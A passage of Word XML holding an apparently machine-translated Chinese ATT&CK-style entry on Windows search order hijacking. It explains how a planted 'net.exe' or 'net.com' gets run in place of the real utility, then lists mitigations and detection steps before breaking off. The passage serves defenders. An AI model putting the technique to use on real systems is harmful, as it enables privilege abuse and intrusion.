          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>example path</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中的程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFA026" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>搜索顺序劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F7E17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>当攻击者滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>搜索未获得路径的程序的顺序时，就会发生搜索顺序劫持。搜索顺序根据用于执行程序的方法而异。但是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统目录之前，通常要在启动程序的目录中搜索。发现程序易受搜索订单劫持（即未指定可执行程序路径的程序）的对手可以通过以未正确指定的程序命名创建的程序，并将其置于其中来利用此漏洞启动程序的目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64F93F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"example.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>使用命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"cmd.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可能会将名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的程序放在与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> example.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>相同的目录中，而不是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统实用程序网。此外，根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGEETT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下定义的可执行扩展的顺序，如果攻击者将名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的程序放在与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>相同的目录中，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe /C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>将执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAA4E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>搜索顺序劫持也是劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>负载的常见做法，</w:t>
      </w:r>
      <w:r w:rsidRPr="000321E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="000321E2">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="000321E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>搜索顺序劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955028A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1727"/>
        <w:gridCol w:w="8009"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="69417D72" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5D4F530E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8009" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="473221A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="7F807B30" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10767BB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BE4E42" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00BE4E42">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C742A1E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>通过围绕带有引号的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> PATH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>变量查找并消除程序配置文件、脚本、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve">PATH </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>环境变量、服</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>务和快捷方式中的路径拦截弱点，当函数允许它们时，这些弱点将带有引号。请注意</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>用于执行或加载二进制文件的搜索顺序，并酌情使用完全限定的路径。卸载软件时清理旧的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>注册表项密钥，以避免没有关联的合法二进制文件。定期搜索并更正或报告可能由于使用不安全路径配置报告软件的自定义或可用工具引入的系统上的路径拦截弱点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="45DDE3DF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F02ECC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009825D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E427060" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>攻击者可能需要在要通过此弱点执行的位置放置新的二进制文件。如果适用，使用应用程序白名单工具（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>防御者应用程序控制、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve">AppLocker </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>或软件限制策略以识别和阻止可能执行路径拦截的恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="3E19DB53" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C7BC969" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009825D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009825D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63EAB475" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>要求将所有可执行文件放在受写入保护的目录中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="65A29418" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FFCB6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009825D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009825D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>用户帐户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="702C115A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>确保设置了适当的权限和目录访问控制，以阻止用户将文件写入顶级目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>和系统目录（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00A94E47">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>以减少恶意文件可能的位置被放置以执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29183F67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22450E5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00187D3B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以部分目录命名的文件以及可能通过环境变量搜索常见进程的位置创建的文件，或者不应是用户可写的文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>针对部分目录命名的可执行路径的执行过程。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统程序命名的程序的文件创建，这些程序通常在没有路径的情况下执行（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
